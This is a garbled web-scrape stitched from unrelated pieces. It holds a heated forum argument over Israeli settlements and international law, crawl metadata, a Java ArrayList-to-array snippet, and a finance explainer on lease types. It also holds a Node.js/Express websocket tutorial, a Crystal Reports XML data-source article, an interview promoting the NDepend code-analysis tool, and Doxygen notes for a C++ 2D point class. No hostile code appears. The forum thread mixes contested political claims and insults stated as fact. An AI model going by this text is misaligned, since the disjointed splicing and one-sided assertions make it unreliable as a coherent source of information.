text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
Yjs is a modular framework for syncing things in real-time - like editors! This guide will walk you through the main concepts of Yjs. First, we are going to create a collaborative editor and sync it with clients. You will get introduced to Yjs documents and to providers, that allow you to sync through different network protocols. Next, we talk about Awareness & Presence which are very important aspects of collaborative software. I created a separate section for Offline Support that shows you how to create offline-ready applications by just adding a few lines of code. The last section is an in-depth guide to Shared Types. If you are impatient jump to the live demo at the bottom of the page 😉 Let's get started by deciding on an editor to use. Yjs doesn't ship with a customized editor. There are already a lot of awesome open-source editors projects out there. Yjs supports many of them using extensions. Editor bindings are a concept in Yjs that allow us to bind the state of a third-party editor to a synceable Yjs document. This is a list of all known editor bindings: For the purpose of this guide, we are going to use the Quill editor - a great rich-text editor that is easy to setup. For a complete reference on how to setup Quill I refer to their documentation. import Quill from 'quill'const quill = new Quill(document.querySelector('#editor'), {modules: {cursors: true,toolbar: [// adding some basic Quill content features[{ header: [1, 2, false] }],['bold', 'italic', 'underline'],['image', 'code-block']],history: {// Local undo shouldn't undo changes// from remote usersuserOnly: true}},placeholder: 'Start collaborating...',theme: 'snow' // 'bubble' is also great}) <link href="" rel="stylesheet"><div id="editor" /> npm i quill Next, we are going to install Yjs and the y-quill editor binding. npm i yjs y-quill import * as Y from 'yjs'import { QuillBinding } from 'y-quill'// A Yjs document holds the shared dataconst ydoc = new Y.Doc()// Define a shared text type on the documentconst ytext = ydoc.getText('quill')// Create an editor-binding which// "binds" the quill editor to a Y.Text type.const binding = new QuillBinding(ytext, quill) The ytext object is a shared data structure for representing text. It also supports formatting attributes (i.e. bold and italic). Yjs automatically resolves concurrent changes on shared data so we don't have to worry about conflict resolution anymore. Then we synchronize ytext with the quill editor and keep them in-sync using the QuillBinding. Almost all editor bindings work like this. You can simply exchange the editor binding if you switch to another editor. But don't stop here, the editor doesn't sync to other clients yet! We need to choose a provider or implement our own communication protocol to exchange document updates with other peers. Each provider has pros and cons. The y-webrtc provider connects clients directly with each other and is a perfect choice for demo applications because it doesn't require you to set up a server. But for a real-world application, you often want to sync the document to a server. In any case, we got you covered. It is easy to change the provider because they all implement the same interface. import { WebrtcProvider } from 'y-webrtc'const provider = new WebrtcProvider('quill-demo-room', ydoc) import { WebsocketProvider } from 'y-websocket'// connect to the public demo server (not in production!)const provider = new WebsocketProvider('wss://demos.yjs.dev', 'quill-demo-room', ydoc) import { DatProvider } from 'y-dat'// set null in order to create a freshconst datKey = '7b0d584fcdaf1de2e8c473393a31f52327793931e03b330f7393025146dc02fb'const provider = new DatProvider(datKey, ydoc) npm i y-webrtc # ornpm i y-websocket # ornpm i y-dat Providers work similarly to editor bindings. They sync Yjs documents through a communication protocol or a database. Most providers have in common that they use the concept of room-names to connect Yjs documents. In the above example, all documents that specify 'quill-demo-room' as the room-name will sync. Providers are meshable. You can connect multiple providers to a Yjs instance at the same time. Document updates will automatically sync through the different communication channels. Meshing providers can improve reliability through redundancy and decrease network delay. By combining Yjs with providers and editor bindings we created our first collaborative editor. In the following sections, we will explore more Yjs concepts like awareness, shared types, and offline editing. But for now, let's enjoy what we built. I included the same fiddle twice so you can observe the editors sync in real-time. Aware, the editor content is synced with all users visiting this page!
https://docs.yjs.dev/getting-started/a-collaborative-editor
CC-MAIN-2021-39
refinedweb
773
56.86
GPIO (General Purpose Input Output) is a type of pin that the brain box has. They are very useful as they allow switches and other sensors to be added very easily. First you must select the mode that the pin should operate in by using: from sr.robot import * R = Robot() #Standard initialization process R.gpio.pin_mode(<PIN>,<MODE>) The pin is indexed from 1 to 4. The mode can be set to one of 3 modes. - OUTPUT – Sets the pin up as an output - INPUT_ANALOG – Sets the pin up to take analog readings - INPUT_PULLUP – Creates a weak pull up on the pin to prevent it floating and sets it as an input GPIO as Outputs If you selected the OUTPUT mode you will be able to select the state of the pin by using: R.gpio.digital_write(<PIN>,<STATE>) Where the state is a Boolean (true or false) value that the pin should be set to. GPIO as digital inputs. This is why the digital input mode is called INPUT_PULLUP. When the pin is set to be a digital input there is a piece of code that can be called a will return a value: R.gpio.digital_read(<PIN>) This piece of code can then be used to assign a value to a variable like so Result = R.gpio.digital_read(<PIN>) You can then use that value for what-ever you like For example, to do something if GPIO 1 is high: From sr.robot import * R = Robot() R.gpio.pin_mode(1, INPUT_PULLUP) Result = R.gpio.digital _read(1) If Result == TRUE: Print ‘So it is TRUE’ GPIO as analog inputs In this mode the pins will be used in much the same way as before. R.gpio.analog_read(<PIN>) Only this time it will return a value between 1 and 16384. GPIO 3 is also incapable of being an analogue input and will return an error.
http://hr-robocon.org/docs/gpio
CC-MAIN-2018-09
refinedweb
318
71.95
DSA concepts with the DSA Self Paced Course at a student-friendly price and become industry ready. Recommended Posts: - std::bad_array_new_length class in C++ with Examples - std::bad_weak_ptr class in C++ with Examples - std::is_trivially_copy_assignable class in C++ with Examples - C++ boost::dynamic_bitset Class with Examples - Difference between Base class and Derived class in C++ - How to convert a class to another class type in C++? - std::any Class in C++ - std::string class in C++ - Array class in C++ - Structure vs class in C++ - std::hash class in C++ STL - std:: valarray class in C++ - std::uniform_int_distribution class in C++ - What all is inherited from parent class in C++? - Virtual base class in C++ - How to implement our own Vector Class in C++? - C++ String Class and its Applications | Set 2 - Difference between namespace and class - C++ string class and its applications - Simulating final
https://www.geeksforgeeks.org/stduniform_real_-distribution-class-in-c-with-examples/?ref=rp
CC-MAIN-2020-34
refinedweb
145
52.33
table of contents other versions - buster 4.16-2 - buster-backports 5.04-1~bpo10+1 - testing 5.10-1 - unstable 5.10-1 other sections NAME¶etext, edata, end - end of program segments SYNOPSIS¶ extern etext; extern edata; extern end; DESCRIPTION¶The addresses of these symbols indicate the end of various program segments: -). CONFORMING TO¶Although these symbols have long been provided on most UNIX systems, they are not standardized; use with caution. NOTES¶The program break. EXAMPLES¶When run, the program below produces output such as the following: $ ./a.out First address past: program text (etext) 0x8048568 initialized data (edata) 0x804a01c uninitialized data (end) 0x804a024 Program source¶ #include <stdio.h> #include <stdlib.h> extern char etext, edata, end; /* The symbols must have some type, or "gcc -Wall" complains */ int main(int argc, char *argv[]) { printf("First address past:\n"); printf(" program text (etext) %10p\n", &etext); printf(" initialized data (edata) %10p\n", &edata); printf(" uninitialized data (end) %10p\n", &end); exit(EXIT_SUCCESS); }
https://manpages.debian.org/unstable/manpages-dev/end.3.en.html
CC-MAIN-2021-21
refinedweb
164
58.79
When. In this tutorial of “How to“, you will know how to find the handle outliers and do outlier analysis on the MultiVariant Data. (More than one variable or features). You will know. - How to handle outliers using the Box Plot Method? - Finding the outliers using the Scatter Plot Matrices. First of all detecting, the outliers import all the necessary libraries for this purpose. I am writing all the code in the Jupyter notebook, therefore make sure to follow the same process with me for more understanding. import numpy as np import pandas as pd import matplotlib.pyplot as plt from pylab import rcParams import seaborn as sb %matplotlib inline rcParams["figure.figsize"] =10,6 About the Dataset. For the demonstration purpose, I am using the Iris dataset. It has 5 columns with the 4 columns as the variable (feature) and the last column(species) is the target. These columns are sepal length, sepal width, petal length, petal width, species. Lets read the dataset and define the data and the target for this dataset. iris_data = pd.read_csv("data/iris.data.csv",header=None,sep=",") iris_data.columns = ["sepal length","sepal width","petal length","petal width", "species" ] data= iris_data.iloc[:,0:4].values # read the values of the first 4 columns target= iris_data.iloc[:,4].values # read the values of last column iris_data[:5] In the third and fourth line, we selected the data and the target. In the data, you will choose the values of all the four columns sepal length, sepal width, petal length, petal width and for the target, you choose the species column. How to handle outliers using the Box Plot Method? There is a term in the box plot that is an interquartile range that is used to find the outliers in the dataset. I am not here going on the details about it. For more reading about it then you can check the Measurement of Dispersion post. It covers how to find the Interquartile range and fence. Visualizing the best way to know anything. For seeing the outliers in the Iris dataset use the following code. sb.boxplot(x="species",y ="sepal length",data=iris_data,palette="hls") In the x-axis, you use the species type and the y-axis the length of the sepal length. In this case, you will find the type of the species verginica that have outliers when you consider the sepal length. You can clearly see the dot point on the species virginica. Finding the outliers using the Scatter Plot Matrices In the above case, we used the matplot library for finding the box plot. But in this case, I will use the Seaborn for finding the outliers using the scatter plot. The following figure will give the pair plot according to the species. sb.pairplot(iris_data,hue="species",palette="hls") Inside the pairplot() method you will pass the 1st argument as data frame (iris_data), hue (species) for specifying the columns for labeling and palette “hls”. In the above figure, you can see the odd redpoint that doesn’t fit any of the clusters. The species in setosa , Note that point and remove the records from the excel. Here the record is at the cell 41. Delete that. Conclusion Finding outliers is an important task for data pre-processing. If there are outliers then your machine learning prediction will be not accurate. Therefore if you have a large dataset, then always make sure that the percentage of the outliers should be less than 5%. Hope this tutorial has given you a clear understanding of how to Handle Outliers on the MultiVariant Data If you any question about dealing with data, then please contact us. You can also like our page for more “How to” tutorial. Thanks Data Science Learner Team Join our list Subscribe to our mailing list and get interesting stuff and updates to your email inbox.
https://www.datasciencelearner.com/handle-outliers-multivariate-outlier-detection/
CC-MAIN-2020-50
refinedweb
647
73.47
This Tutorial will Explain How to Pass an Array as an Argument to a Method and as a Return Value for the Method in Java with Examples: Methods or functions are used in Java to break the program into smaller modules. These methods are called from other functions and while doing so data is passed to and from these methods to the calling functions. The data passed from the calling function to the called function is in the form of arguments or parameters to the function. The data returned from the function is the return value. => Check Here To See A-Z Of Java Training Tutorials Here. Usually, all the primitive and derived types can be passed to and returned from the function. Likewise, arrays also can be passed to the method and returned from the method. In this tutorial, we will discuss how to pass arrays as an argument to a method and return the array from the method. What You Will Learn: Passing Array To The Method In Java. Given below is the method prototype: void method_name (int [] array); This means method_name will accept an array parameter of type int. So if you have an int array named myarray, then you can call the above method as follows: method_name (myarray); The above call passes the reference to the array myarray to the method ‘method_name’. Thus, the changes made to myarray inside the method will reflect in the calling method as well. Unlike in C/C++, you need not pass the length parameter along with array to the method as all Java arrays have a property ‘length’. However, it might be advisable to pass several elements in case only a few positions in the array are filled. The following Java program demonstrates the passing of an array as a parameter to the function. public class Main { //method to print an array, taking array as an argument private static void printArray(Integer[] intArray){ System.out.println("Array contents printed through method:"); //print individual elements of array using enhanced for loop for(Integer val: intArray) System.out.print(val + " "); } public static void main(String[] args) { //integer array Integer[] intArray = {10,20,30,40,50,60,70,80}; //call printArray method by passing intArray as an argument printArray(intArray); } } Output: In the above program, an array is initialized in the main function. Then the method printArray is called to which this array is passed as an argument. In the printArray method, the array is traversed and each element is printed using the enhanced for loop. Let us take another example of passing arrays to methods. In this example, we have implemented two classes. One class contains the calling method main while the other class contains the method to find the maximum element in the array. So, the main method calls the method in another class by passing the array to this method find_max. The find_max method calculates the maximum element of the input array and returns it to the calling function. class maxClass{ public int find_max(int [] myarray) { int max_val = 0; //traverse the array to compare each element with max_val for(int i=0; i<myarray.length; i++ ) { if(myarray[i]>max_val) { max_val = myarray[i]; } } //return max_val return max_val; } } public class Main { public static void main(String args[]) { //input array int[] myArray = {43,54,23,65,78,85,88,92,10}; System.out.println("Input Array:" + Arrays.toString(myArray)); //create object of class which has method to find maximum maxClassobj = new maxClass(); //pass input array to find_max method that returns maximum element System.out.println("Maximum value in the given array is::"+obj.find_max(myArray)); } } Output: In the above program, we have passed the array from one method in one class to another method present in a different class. Note that the approach of passing array is the same whether the method is in the same class or different class. How To Return An Array In Java Apart from all the primitive types that you can return from Java programs, you can also return references to arrays. While returning a reference to an array from a method, you should keep in mind that: - The data type that returns value should be specified as the array of the appropriate data type. - The returned value from a method is the reference to the array. The array is returned from a method in the cases where you need to return multiple values of the same type from a method. This approach becomes useful as Java doesn’t allow returning multiple values. The following program returns a string array from a method. import java.util.*; public class Main { public static String[] return_Array() { //define string array String[] ret_Array = {"Java", "C++", "Python", "Ruby", "C"}; //return string array return ret_Array; } public static void main(String args[]) { //call method return_array that returns array String[] str_Array = return_Array(); System.out.println("Array returned from method:" + Arrays.toString(str_Array)); } } Output: The above program is an example of returning an array reference from a method. The ‘return_array’ method is declared an array of strings ‘ret_Array’ and then simply returns it. In the main method, the return value from the return_array method is assigned to the string array and then displayed. The following program provides another example of returning an array from a method. Here, we use an integer array that is used to store the computed random numbers and then this array is returned to the caller. public class Main { public static void main(String[] args) { final int N = 10; // number of random elements // Create an array int[] random_numbers; // call create_random method that returns an array of random numbers random_numbers = create_random(N); System.out.println("The array of random numbers:"); // display array of random numbers for (int i = 0; i <random_numbers.length; i++) { System.out.print(random_numbers[i] + " "); } } public static int[] create_random(int N) { //Create an array of size N => number of random numbers to be generated int[] random_array = new int[N]; //generate random numbers and assign to array for (int i = 0; i <random_array.length; i++) { random_array[i] = (int) (Math.random() * 10); } //return array of random numbers return random_array; } } Output: Sometimes the results of the computation are null or empty. In this case, most of the time, the functions return null. When arrays are involved it is better to return an empty array instead of null. This is because the method of returning the array will have consistency. Also, the caller need not have special code to handle null values. Frequently Asked Questions Q #1) Does Java Pass Arrays by Reference? Answer: Yes. Arrays are by default passed by reference. While passing the array to function, we simply provide the name of the array that evaluates to the starting address of the array. Q #2) Why Arrays are not passed by value? Answer: Arrays cannot be passed by value because the array name that is passed to the method evaluates to a reference. Q #3) Can an Array be returned in Java? Answer: Yes, we can return an array in Java. We have already given examples of returning arrays in this tutorial. Q #4) Can a method return multiple values? Answer: According to specifications, Java methods cannot return multiple values. But we can have roundabout ways to simulate returning multiple values. For example, we can return arrays that have multiple values or collections for that matter. Q #5) Can a method have two Return statements in Java? Answer: No. Java doesn’t allow a method to have more than one return value. Conclusion Java allows arrays to be passed to a method as an argument as well as to be returned from a method. Arrays are passed to the method as a reference. While calling a particular method, the array name that points to the starting address of the array is passed. Similarly, when an array is returned from a method, it is the reference that is returned. In this tutorial, we discussed the above topics in detail with examples. In our subsequent tutorials, we will cover more topics on arrays in Java. => Visit Here For The Exclusive Java Training Tutorial Series.
https://www.softwaretestinghelp.com/pass-return-array-in-java/
CC-MAIN-2021-17
refinedweb
1,349
54.42
C++ API: "Smart pointers" for use with and in ICU4C C++ code. More... #include "unicode/utypes.h" #include <memory> Go to the source code of this file. C++ API: "Smart pointers" for use with and in ICU4C C++ code. These classes are inspired by but none of those provide for all of the goals for ICU smart pointers: For details see Definition in file localpointer.h. "Smart pointer" definition macro, deletes objects via the closeFunction. Defines a subclass of LocalPointerBase which works just like LocalPointer<Type> except that this subclass will use the closeFunction rather than the C++ delete operator. Usage example: Definition at line 550 of file localpointer.h.
https://unicode-org.github.io/icu-docs/apidoc/dev/icu4c/localpointer_8h.html
CC-MAIN-2021-39
refinedweb
110
64.71
This article was published on Thursday, August 12, 2021 by Pablo Sáez @ The Guild Blog ECMAScript modules, also known as ESM, is the official standard format to package JavaScript, and fortunately Node.js supports it 🎉. But if you have been in the Node.js Ecosystem for some time and developing libraries, you have probably encountered the fact that ESM compatibility has been a struggle, behind experimental flags and/or broken for practical usage. Very few libraries actually supported it officially, but since Node.js v12.20.0 (2020-11-24) and v14.13.0 (2020-09-29) the latest and finally stable version of package.exports is available, and since support for Node.js v10.x is dropped, everything should be fine and supporting ESM shouldn't be that hard. After working on migrating all The Guild libraries, for example GraphQL Code Generator or the recently released Envelop, and contributing in other important libraries in the ecosystem, like graphql-js, I felt like sharing this experience is really valuable, and the current state of ESM in the Node.js Ecosystem as a whole needs some extra care from everyone. This post is intended to work as a guide to support both CommonJS and ESM and will be updated accordingly in the future as needed, and one key feature to be able to make this happens, is the package.json exports field. exports field The official Node.js documentation about it is available here, but the most interesting section is Conditional exports, which enables libraries to support both CommonJS and ESM: ```json filename="package.json" { "name": "foo", "exports": { "require": "./main.js", "import": "./main.mjs" } } This field basically tells Node.js what file to use when importing/requiring the package. But very often you will encounter the situation that a library can (and should, in my opinion) ship the library keeping their file structure, which allows for the library user to import/require only the modules they need for their application, or simply for the fact that a library can have more than a single entry-point. For the reason just mentioned, the standard `package.json#exports` should look something like this (even for single entry-point libraries, it won't hurt in any way): > Assuming that the build/compilation/transpilation is outputted into the "dist" folder ```jsonc { // package.json "name": "foo", "exports": { ".": { "require": "./dist/index.js", "import": "./dist/index.mjs" }, "./*": { "require": "./dist/*.js", "import": "./dist/*.mjs" } } } To specify specific paths for deep imports, you can specify them: "exports": { // ... "./utils": { "require": "./dist/utils.js", "import": "./dist/utils.mjs" } } If you don't want to break backward compatibility on import/require with the explicit .js, the solution is to add the extension in the export: "exports": { // ... "./utils": { "require": "./dist/utils.js", "import": "./dist/utils.mjs" } "./utils.js": { "require": "./dist/utils.js", "import": "./dist/utils.mjs" } } Using the .mjs extension To add support ESM for Node.js, you have two alternatives: - build your library into ESM Compatible modules with the extension .mjs, and keep the CommonJS version with the standard .jsextension - build your library into ESM Compatible modules with the extension .js, set "type": "module", and the CommonJS version of your modules with the .cjsextension. Clearly using the .mjs extension is the cleaner solution, and everything should work just fine. ESM Compatible This section assumes that your library is written in TypeScript or has at least has a transpilation process, if your library is targeting the browser and/or React.js, it most likely already does. Building for a library to be compatible with ESM might not be as straight-forward as we would like, and it's for the simple fact that in the pure ESM world, require doesn't exists, as simple as that, You will need to refactor any require into import. Changing require If you have a top-level require, changing it to ESM should be straight-forward: from const foo = require('foo') to import foo from 'foo' But if you are dynamically calling require inside of functions, you will need to do some refactoring to be able to handle async imports: from function getFoo() { const { bar } = require('foo') return bar } to async function getFoo() { const { bar } = await import('foo') return bar } What about __dirname, require.resolve, require.cache? This is when it gets complicated, citing the Node.js documentation: This is kinda obvious, you should use import and export The only workaround to have an isomorphic __dirname or __filename to be used for both "cjs" and "esm" without using build-time tools like @rollup/plugin-replace or esbuild "define" would be using a library like filedirname that does a trick inspecting error stacks, it's clearly not the cleanest solution. The workaround alongside with createRequire should like this import filedirname from 'filedirname' import { createRequire } from 'module' const [filename] = filedirname() const require_isomorphic = createRequire(filename) require_isomorphic('foo') require.resolve and require.cache are not available in the ESM world, and if you are not able to do the refactor to not use them, you could use createRequire, but keep in mind that the cache and file resolution is not the same as while using import in ESM. Deep import of node_modules packages Part of the ESM Specification is that you have to specify the extension in explicit scripts imports, which means when you are importing a specific JavaScript file from a node_modules package you have to specify the .js extension, otherwise all the users will get Error [ERR_MODULE_NOT_FOUND]: Cannot find module This won't work in ESM import { foo } from 'foo/lib/main' But this will import { foo } from 'foo/lib/main.js' BUT there is a big exception to this, which is the node_modules package you are importing uses the exports package.json field, because generally the exports field will have to extension in the alias itself, and if you specify the extension on those packages, it will result in a double extension: ```json filename="bar/package.json" { "name": "bar", "exports": { "./": { "require": "./dist/.js", "import": "./dist/*.mjs" } } } ```ts import { bar } from 'bar/main.js' That will translate into node_modules/bar/main.js.js in CommonJS and node_modules/bar/main.js.mjs in ESM. Can we test if everything is actually ESM compatible? The best solution for this is to have ESM examples in a monorepo testing firsthand if everything with the logic included doesn't break, using tools that output both CommonJS & ESM like tsup might become very handy, but that might not be straightforward, especially for big projects. There is a relatively small but effective way of automated testing for all the top-level imports in ESM, you can have an ESM script that imports every .mjs file of your project, it will quickly scan, importing everything, and if nothing breaks, you are good to go 👍, here is a small example of a script that does this, and it's currently used in some projects that support ESM. TypeScript In regard to TypeScript supporting ESM, it divides into two subjects: Support for exports Until this issue TypeScript#33069 is closed, TypeScript doesn't have complete support for it, fortunately, there are 2 workarounds: - Using typesVersions The original usage for this TypeScript feature was not for this purpose, but it works, and it's a fine workaround until TypeScript actually supports it ```json filename="package.json" { "typesVersions": { "": { "dist/index.d.ts": ["dist/index.d.ts"], "": ["dist/", "dist//index.d.ts"] } } } * Publishing a modified version of the package This method requires tooling and/or support from the package manager. For example, using the package.json field `publishConfig.directory`, [pnpm supports it]() and [lerna publish as well](). This allows you to publish a modified version of the package that can contain a modified version of the `exports`, following the types with the file structure in the root, and TypeScript will understand it without needing to specify anything special in the package.json for it to work. ```json filename="dist/package.json" { "exports": { "./*": { "require": "./*.js", "import": "./*.mjs" }, ".": { "require": "./index.js", "import": "./index.mjs" } } } In The Guild we use this method using tooling that creates the temporary package.json automatically. See bob-the-bundler & bob-esbuild Support for .mjs output Currently, the TypeScript compiler can't output .mjs, Check the issue TypeScript#18442. There are workarounds, but nothing actually works in 100% of the possible use-cases (see for example, ts-jest issue), and for that reason, we recommend tooling that enables this type of building without needing any workaround, usually using Rollup and/or esbuild. ESM needs our attention There are still some rough edges while supporting ESM, this guide shows only some of them, but now it's time to rip the bandaid off. I can mention a very famous contributor of the Node.js Ecosystem sindresorhus who has a very strong stance in ESM. His Blog post Get Ready For ESM and a very common GitHub Gist nowadays in a lot of very important libraries he maintains. But personally, I don't think only supporting ESM and killing CommonJS should be the norm, both standards can live together, there is already a big ecosystem behind CommonJS, and we shouldn't ignore it. Top comments (1) I disagree, the big hurdle is exactly because there are two competing systems where one is used more the other but is not the default. This is a sign that CommonJS is at deaths gate. Let’s move on
https://dev.to/the-guild/what-does-it-take-to-support-node-js-esm-lop
CC-MAIN-2022-40
refinedweb
1,563
52.7
MS topic. If you Bing type forwarding you’ll find many blogs that talk about it as well. Yes, that’s right. I used Bing as a verb. Get used to it; Bing is awesome.. Example: TimeZoneInfo. Walkthrough 1: Observe the forwarding of System.TimeZoneInfo This walkthrough assumes you have .NET 4.0 Beta 1 installed (see here) and an older release of .NET, such as .NET 3.5, installed. Code up a simple C# app that uses System.TimeZoneInfo: namespace test { class Class1 { static void Main(string[] args) { System.TimeZoneInfo ti = null; } } } Next, compile this into an exe using a CLR V2-based toolset (e.g., .NET 3.5). You can use Visual Studio, or just run from the command-line (but be sure your path points to the pre-.NET 4.0 C# compiler!). Example: Again, be sure you’re using an old csc.exe from, say, a NET 3.5 installation. To verify, open up Class1.exe in ildasm, and take a look at Main(). It should look something like this: The key here is to note that the IL uses a TypeRef for System.TimeZoneInfo (01000006) that points to System.Core.dll.. Ok, so how do we run this pre-.NET 4.0 executable against .NET 4.0? A config file, of course. Paste the following into a file named Class1.exe.config that sits next to Class1.exe:… Walkthrough 2: Forwarding your own type To experiment with forwarding your own types, the process is: - Create Version 1 of your library - Create version 1 of your library assembly that defines your type (MyLibAssemblyA.dll) - Create an app that references your type in MyLibAssemblyA.dll (MyClient.exe) - Create version 2 of your library - Recompile MyLibAssemblyA.dll to forward your type elsewhere (MyLibAssemblyB.dll) - Don’t recompile MyClient.exe. Let it still think the type is defined in MyLibAssemblyA.dll. Version 1 Just make a simple C# DLL that includes your type Foo. Something like this (MyLibAssemblyA.cs): using System; public class Foo { } and compile it into MyLibAssemblyA.dll: Then make yourself a client app that references Foo. using System; public class Test { public static void Main() { Foo foo = new Foo(); Console.WriteLine(typeof(Foo).AssemblyQualifiedName); } } and compile this into MyClient.exe: When you run MyClient.exe, you get this boring output: Ok, time to upgrade! Version 2 Time goes by, your library is growing, and its time to split it into two DLLs. Gotta move Foo into the new DLL. Save this into MyLibAssemblyB.cs using System; public class Foo { } compile that into your new DLL, MyLibAssemblyB.dll: And for the type forward. MyLibAssemblyA.cs now becomes: using System; using System.Runtime.CompilerServices; [assembly: TypeForwardedTo(typeof(Foo))] compile that into MyLibAssemblyA.dll (overwriting your Version 1 copy of that DLL): Now, when you rerun MyClient.exe (without recompiling!), it will look for Foo first in MyLibAssemblyA.dll, and then hop over to MyLibAssemblyB.dll: And this all despite the fact that MyClient.exe still believes that Foo lives in MyLibAssemblyA: Profilers. In any case, whether you think your profiler will be affected by type forwarding, be sure to test, test, test!
https://blogs.msdn.microsoft.com/davbr/2009/09/30/type-forwarding/
CC-MAIN-2019-35
refinedweb
524
70.8
#include "core/net.h" #include "mibs/mib2_module.h" #include "mibs/mib2_impl.h" #include "core/crypto.h" #include "encoding/asn1.h" #include "encoding/oid.h" #include "debug.h" Go to the source code of this file. MIB-II second version of the Management Information Base (MIB-II) is used to manage TCP/IP-based hosts. Refer to the following RFCs for complete details: Definition in file mib2_module.c. Definition at line 37 of file mib2_module.c. MIB-II base. Definition at line 56 of file mib2_module.c. MIB-II module. Definition at line 2201 of file mib2_module.c. MIB-II objects. Definition at line 63 of file mib2_module.c.
https://oryx-embedded.com/doc/mib2__module_8c.html
CC-MAIN-2018-51
refinedweb
108
56.52
Jan 24th 2011, 18:27 by The Economist online | RAMALLAH FOR almost 24 hours, Al Jazeera, the Arab world’s most popular news channel, has lead its bulletins with reports of outlandish concessions made by Palestinian officials during negotiations with Israel since 1999. So grave were the allegations contained in some 1,600 documents and 50 maps leaked to the channel, claimed commentators Al Jazeera drafted into its studios, they would end the last kicks from the dying horse of the peace process, and unseat the Palestinian leadership. If anything the first batch of leaked papers appears to do the opposite.. How Al Jazeera’s spin will play out amongst the Palestinian public is unclear. Allies of the Palestinian president, Mahmoud Abbas, predictably denounced the messenger, sidestepping his message, by attacking Al Jazeera’s offices. A senior Palestinian official, Yasser Abd Rabbo, blasted the Emir of Qatar, the small Gulf state that owns Al Jazeera, of conducting a campaign against Mr Abbas in order to project his regional influence. Ramallah’s rumour-mill blamed Mohammed Dahlan, a former security chief, against whom Mr Abbas recently launched an investigation on suspicion of plotting to overthrow him. Only last week, Mr Dahlan’s aides threatened to release embarrassing documents if what he termed the "witch-hunt" by Mr Abbas persisted. On current evidence, the leaks are just as awkward for Israel. They contradict the official Israeli narrative that the Palestinians rejected generous Israeli offers, and portray Palestinians as initiating ideas, only to be stymied by Israeli stonewalling. They give credence to Palestinian claims that Mr Netanyahu made no counter-proposals. Had a more responsive Israeli prime minister been in charge, or had the Obama administration picked up from where his predecessors left off, rather than frittering away two years on an elusive settlement freeze, a two-state agreement might yet have looked imminent. To date only the usual suspects, led by Hamas, Fatah's Islamist rivals who rule Gaza, have accused Mr Abbas and his aides of selling out. Inside the West Bank, there have been no reported demonstrations or calls for Mr Abbas to go. Whether the calm continues, though, could depend on Al Jazeera’s next instalments. The channel is broadcasting trailers for further revelations on Palestinian security coordination with Israel, Mr Abbas’s position on the Gaza blockade and the fighting in Gaza in the winter of 2008-2009. Tonight’s promised exposé is on refugees.: @ fuzzywzhe and any other Arab/Muslim apologist: What concessions do you want the Israelis to make? You seem to insist the so-called Palestinians have made concessions! Where's the proof? Read the Clinton Parameters … if the so-called Palestinians wanted peace … Barak and Olmert offered them the deal in 2000 and 2008 … so again where's the proof the so-called Palestinians have made concessions? The Palestine Papers … make it appear … the negotiators have made progress … with their 'lips' … but they haven't told their people ANYTHING … for that matter … what makes these 'clowns' … leaders … What are they leaders of? They DON'T HAVE LEGITIMACY! Why should Israel give them a Peace Deal that they (the Arab/Muslims) can't execute? The deal … and there is a deal available … can only be with the FULL UNDERSTANDING OF THE LARGER ARAB/MUSLIM WORLD … THAT THERE WILL BE NO FURTHER CLAIMS WITH ISRAEL … See the Clinton Parameters … are the Arab/Muslims willing to sign? I don't think they're prepared … they're still too invested in the ideas of 'REPLACING ISRAEL' … not making peace with Israel! Say it ain't so! HAHAHA!. I have to agree with "FernandoTorresIsGod" who says "We will see some imaginative new Israeli excuses for refusing to make peace shortly". Right now it's a slow trickle of just blind denial from our so called press, saying that what's been reported has been taken out of context but not giving any examples, that Israel HAS made painful concession offers but not naming any, and of course, absolutely no links to the original source documents. The Fatah cronies are bribed millions or billions to sell out the Palestinian people. It's all a farce. Without the willingness to give up UTTERLY the right of return (say for instance, for a big fat set of individual checks where justified) .. this is all voodoo talks for no purpose. Right of Return is code for no Israel That's ALL there is to it. Al-Jazeera may not know anything about this and neither do the ever grumpy Arab masses but in talks you compromise and concede some stuff. That is why it is called negotation. Besides non Palestinian Arab masses and Arab governments screaming La! La! La! at every turn in history has done the Palestinian people no good. So maybe it is time they started saying maybe... If you are interested about the current situation in Darfur and the arrest warrant issued by the International Criminal Court against President Bashir, come and participate in the discussion at UCLA Law Forum. These leaks show that the Palestinian Authority was willing to bend backwards to accommodate the Israelis but received nothing in return The claim by Israel that there is no reliable peace partner has now been busted. I think Al Jazeera did good to release these documents and I hope more will be forthcoming. On another note: maybe both Israelis and more so the Palestinians are not interested in a two state solution. This is because the Palestinians see themselves as the heirs of the single nation that would be created when the negotiations fail. At least this is what the population growth numbers suggest. Fray Enough of this demagoguery. I did not say who is better, even though Israel obviously is. I said this is a region known for its militancy and wars. The same Syria was involved in messing with all its neighbors, all of them. Howcome when it comes to the Israeli Arab conflict, it suddenly becomes all Israel's fault? Where does this assumption that Syria wants peace, but Israel does not, come from? Syria never offered its Kurds a two nations two states solution for example. And by the way why don't I see you people demanding self determination for the Kurds? Here is a real nation, not some pseudo nation like the Palestinians. The Kurds speak their own language, have a distinctive culture and even some of them practice a unique Kurdish religion. 25 million people without a state! Hundreds of thousands died, were gassed with mustard gas by Saddam. Khomeini even declared on them Jihad. Only a few months ago Germany demanded investigation into the use of chemical weapons by Turkey against the Kurds. How many comments you posted during the last year demanding justice for 25 million stateless people? You know, the Kurds in Turkey are not like Israeli Arabs who have schools in Arabic and such stuff. And it's not that the negotiations between the Kurds and Turkey collapsed because the two sides could not agree should they swap 7% or 2%. Turkey is not going to have such negotiations anytime soon. Turkey has never agreed to any partition like Israel did at the beginning and was attacked in response. How has Israel become the source of all troubles and wars in this region that all of you are now leaching on this conflict? So... Israel is better than Syria. Also better than Zimbabwe and North Korea. You must be proud, huh? *** These are not the "second Caliph's" times, NB12.The West Bank and East Jerusalem are occupied territory and are not recognized as part of Israel by any nation on Earth. *** Obviously these are no the second Caliph's times. Have you ever had any idea about this region, you would have known that before the Caliphs, this was the most diverse region on earth. Plurality of religions, mystical sects, languages. Where are they all gone? Why does this region look as if it was wiped out by a cultural mega nuclear bomb? Sure, it's all Israel's fault. What a shame the international law could not help them all. The last century and the beggining of this one. Genocide on genocide. Whole communities collapsed. Every second country went through a civil war in which hundreds of thousands died. And yet, what a miraculous coincidence. When it comes to the Jews, the Arabs just kept feeling themselves with the spirit of peace and compromise. How amazing! The only country in the region where a district court can order the army to release data to an NGO that openly engages in subversive activity against its own state. And yet it's this country that's responsible for all wars in the region. The same Syrian regime flattened a whole city, dozens of thousand died, and reconstruction did not start before the regime made sure that 